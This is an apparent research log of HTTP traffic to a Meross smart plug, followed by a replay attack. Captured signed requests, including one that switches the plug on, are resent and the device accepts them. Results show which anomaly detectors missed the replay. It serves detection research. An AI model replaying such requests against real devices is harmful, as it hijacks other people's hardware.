POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"6f32cb6e4710e389298f479b0d89b923","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"d53340e0289af68a808f50f3c1c19bdd","timestamp":1693902069,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"6f32cb6e4710e389298f479b0d89b923","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693902068,"timestampMs":823,"sign":"73ec9d5a348064d93f264752db2f757f"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1693902068,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":0}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":1693902043}],"triggerx":[],"timerx":[]}}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"b5f1b76c0b61e81260e0724f840c096f","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"19e9c7d6f80d115a9fd4ca88481183aa","timestamp":1693902069,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"b5f1b76c0b61e81260e0724f840c096f","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693902068,"timestampMs":910,"sign":"fb7d197e41e9937a54b35bfd87bc3a29"},"payload":{"online":{"status":0}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"4aeb80a3be4f998ba22167780e866e9d","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"7137f359cc4b0a0ec39b623ecdcdcb05","timestamp":1693902076,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"4aeb80a3be4f998ba22167780e866e9d","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693902076,"timestampMs":242,"sign":"7137f359cc4b0a0ec39b623ecdcdcb05"},"payload":{}}

START REPLAY ATTACK
#######################################################################################
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"4aeb80a3be4f998ba22167780e866e9d","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"7137f359cc4b0a0ec39b623ecdcdcb05","timestamp":1693902076,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"4aeb80a3be4f998ba22167780e866e9d","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693902121,"timestampMs":491,"sign":"005d4a33c6f24985104906001f5708ed"},"payload":{}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"b5f1b76c0b61e81260e0724f840c096f","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"19e9c7d6f80d115a9fd4ca88481183aa","timestamp":1693902069,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"b5f1b76c0b61e81260e0724f840c096f","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693902121,"timestampMs":499,"sign":"e95f10d84e3c7ce7b50053c04a1b3207"},"payload":{"online":{"status":0}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"6f32cb6e4710e389298f479b0d89b923","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"d53340e0289af68a808f50f3c1c19bdd","timestamp":1693902069,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"6f32cb6e4710e389298f479b0d89b923","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693902121,"timestampMs":507,"sign":"3498860d90294e1d93d563d4f1d954e1"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1693902121,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":0}},"digest":{"togglex":[{"channel":0,"onoff":1,"lmTime":1693902121}],"triggerx":[],"timerx":[]}}}}

****************************************************************
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=OneClassSVM(gamma='auto', nu=0.001)
REPLAY ATTACK SUCCESSFUL WITH CLF=IsolationForest(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=EllipticEnvelope(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=LocalOutlierFactor(contamination=0.01, novelty=True)
REPLAY ATTACK SUCCESSFUL WITH CLF=CustomClassifier()
END REPLAY ATTACK
